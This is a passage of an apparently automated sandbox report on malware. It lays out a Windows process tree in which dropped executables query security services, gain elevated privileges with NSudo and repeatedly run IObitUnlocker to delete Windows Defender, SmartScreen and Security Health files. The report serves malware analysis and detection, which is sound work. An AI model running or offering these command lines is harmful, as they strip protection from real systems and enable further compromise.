        "C:\Users\Admin\AppData\Local\Temp\10486790101\blOahSM.exe" -sfxwaitall:1 "timeout" /t 2 /nobreak
        6⤵
        Checks computer location settings
        
        PID:1964
        
        C:\Windows\System32\timeout.exe
        
        "C:\Windows\System32\timeout.exe" /t 2 /nobreak
        7⤵
        Delays execution with timeout.exe
        
        PID:5264
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
        6⤵
        
        PID:5224
    - - C:\Users\Admin\AppData\Local\Temp\10486800101\08IyOOF.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10486800101\08IyOOF.exe"
        5⤵
        Suspicious use of SetThreadContext
        
        PID:5472
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:5996
    - - C:\Users\Admin\AppData\Local\Temp\10486810101\Bw5ZAOe.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10486810101\Bw5ZAOe.exe"
        5⤵
        
        PID:7996
- - C:\Temper\2S1Sw2mW.exe
    "C:\Temper\2S1Sw2mW.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:668
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CWcenut.bat" "
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3808
    - - C:\Users\Admin\AppData\Local\Temp\Work\nircmd.exe
        
        nircmd win min process "cmd.exe"
        5⤵
        Executes dropped EXE
        
        PID:2320
    - - C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        5⤵
        
        PID:708
    - - C:\Windows\SysWOW64\reg.exe
        
        reg query "HKU\S-1-5-19"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2700
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Themes\Personalize" /v "AppsUseLightTheme" /t reg_dword /d 0 /f
        5⤵
        Modifies data under HKEY_USERS
        
        PID:936
    - - C:\Users\Admin\AppData\Local\Temp\Work\NSudoLG.exe
        
        NSudoLG -U:T -P:E -UseCurrentConsole "C:\Users\Admin\AppData\Local\Temp\CWcenut.bat" any_word
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2344
    - - C:\Windows\SysWOW64\mode.com
        
        Mode 79,49
        5⤵
        
        PID:1488
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1664
    - - C:\Windows\SysWOW64\reg.exe
        
        reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA"
        5⤵
        
        PID:2560
    - - C:\Windows\SysWOW64\find.exe
        
        find /i "0x0"
        5⤵
        
        PID:2304
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2444
      - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:556
    - - C:\Windows\SysWOW64\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Services\WinDefend"
        5⤵
        
        PID:4648
    - - C:\Windows\SysWOW64\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Services\MDCoreSvc"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3104
    - - C:\Windows\SysWOW64\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Services\WdNisSvc"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2288
    - - C:\Windows\SysWOW64\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Services\Sense"
        5⤵
        
        PID:3124
    - - C:\Windows\SysWOW64\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Services\wscsvc"
        5⤵
        
        PID:1432
    - - C:\Windows\SysWOW64\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Services\SgrmBroker"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1340
    - - C:\Windows\SysWOW64\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Services\SecurityHealthService"
        5⤵
        
        PID:4816
    - - C:\Windows\SysWOW64\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Services\webthreatdefsvc"
        5⤵
        
        PID:1460
    - - C:\Windows\SysWOW64\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Services\webthreatdefusersvc"
        5⤵
        
        PID:640
    - - C:\Windows\SysWOW64\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Services\WdNisDrv"
        5⤵
        
        PID:3784
    - - C:\Windows\SysWOW64\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Services\WdBoot"
        5⤵
        
        PID:3572
    - - C:\Windows\SysWOW64\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Services\WdFilter"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2084
    - - C:\Windows\SysWOW64\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Services\SgrmAgent"
        5⤵
        
        PID:3780
    - - C:\Windows\SysWOW64\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Services\MsSecWfp"
        5⤵
        
        PID:3244
    - - C:\Windows\SysWOW64\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Services\MsSecFlt"
        5⤵
        
        PID:4688
    - - C:\Windows\SysWOW64\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Services\MsSecCore"
        5⤵
        
        PID:4536
    - - C:\Windows\SysWOW64\reg.exe
        
        reg query HKLM\System\CurrentControlset\Services\WdFilter
        5⤵
        Modifies registry key
        
        PID:2740
    - - C:\Windows\SysWOW64\reg.exe
        
        reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion" /v "ProductName"
        5⤵
        
        PID:4700
    - - C:\Windows\SysWOW64\find.exe
        
        find /i "Windows 7"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4704
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ver "
        5⤵
        
        PID:2748
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /c:"6.1.7601"
        5⤵
        
        PID:4176
    - - C:\Users\Admin\AppData\Local\Temp\Work\7z.exe
        
        7z x -aoa -bso0 -bsp1 "DKT.zip" -p"DDK" "Unlocker.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:1332
    - - C:\Users\Admin\AppData\Local\Temp\Work\Unlocker.exe
        
        Unlocker /CurrentDiskSize
        5⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:1300
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c sc query IObitUnlocker
        6⤵
        
        PID:2664
        
        C:\Windows\system32\sc.exe
        
        sc query IObitUnlocker
        7⤵
        Launches sc.exe
        
        PID:2296
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /f /pid "1300"
        6⤵
        
        PID:4428
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /pid "1300"
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1040
    - - C:\Users\Admin\AppData\Local\Temp\Work\Unlocker.exe
        
        Unlocker /dеlwd
        5⤵
        Sets service image path in registry
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4628
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c sc query IObitUnlocker
        6⤵
        
        PID:3424
        
        C:\Windows\system32\sc.exe
        
        sc query IObitUnlocker
        7⤵
        Launches sc.exe
        
        PID:3692
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c sc stop IObitUnlocker & sc delete IObitUnlocker
        6⤵
        
        PID:1528
        
        C:\Windows\system32\sc.exe
        
        sc stop IObitUnlocker
        7⤵
        Launches sc.exe
        
        PID:4392
        
        C:\Windows\system32\sc.exe
        
        sc delete IObitUnlocker
        7⤵
        Launches sc.exe
        
        PID:5116
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /f /pid "4628"
        6⤵
        
        PID:4812
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /pid "4628"
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5064
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 2 /nobreak
        5⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:4352
    - - C:\Users\Admin\AppData\Local\Temp\Work\Unlocker.exe
        
        Unlocker /DеlWD
        5⤵
        Sets service image path in registry
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1328
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c sc query IObitUnlocker
        6⤵
        
        PID:1176
        
        C:\Windows\system32\sc.exe
        
        sc query IObitUnlocker
        7⤵
        Launches sc.exe
        
        PID:4584
      - C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:2688
      - C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:4892
      - C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:1560
      - C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:1632
      - C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:4720
      - C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:3836
      - C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:3168
      - C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 